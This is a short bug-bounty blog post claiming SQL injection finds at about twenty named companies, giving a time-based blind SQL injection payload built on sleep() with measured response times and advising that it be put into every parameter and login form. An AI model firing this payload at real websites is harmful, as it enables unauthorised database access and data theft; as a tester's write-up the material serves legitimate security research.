How I Found Sql Injection on 8x8 , Cengage,Comodo,Automattic,20 company

How I Found Sql Injection on 8x8 , Cengage ,Comodo ,Automattic ,intel ,IBM ,MTN Group , , ,

Ahmad A Abdulla
2 min readMar 11, 2021


What is SQL injection (SQLi)?

SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application’s content or behavior.

I will show you my method to find SQL injection in one photo I hacked all this company in this way and reported in hacker and by email to the company
it’s easy to find SQL injection on the website just we need (burp) to test on the website now see these photos

whit is this command ? why we use this ?

if you add sleep(12) the response time needs 12 seconds to browse the webpage and if you add sleep(20) the browser and the burp response after 20-second show you response and page

  • 0"XOR(if(now()=sysdate(),sleep(12),0))XOR”Z => 12.508
  • 0"XOR(if(now()=sysdate(),sleep(12),0))XOR”Z => 12.543
  • 0"XOR(if(now()=sysdate(),sleep(0),0))XOR”Z => 0.523
  • 0"XOR(if(now()=sysdate(),sleep(6),0))XOR”Z => 6.565
  • 0"XOR(if(now()=sysdate(),sleep(3),0))XOR”Z => 3.518
  • 0"XOR(if(now()=sysdate(),sleep(0),0))XOR”Z => 0.502
  • 0"XOR(if(now()=sysdate(),sleep(12),0))XOR”Z => 12.491
  • 0"XOR(if(now()=sysdate(),sleep(6),0))XOR”Z => 6.508
  • 0"XOR(if(now()=sysdate(),sleep(0),0))XOR”Z => 0.695

I use this schedule to find SQL injection and I hacked 20 company from this methods

and another way to find SQL injection put this command in all parameters and login forms

I’m here

lu3ky13 is on @buymeacoffee! 🎉

You can support by buying a coffee ☕️ here —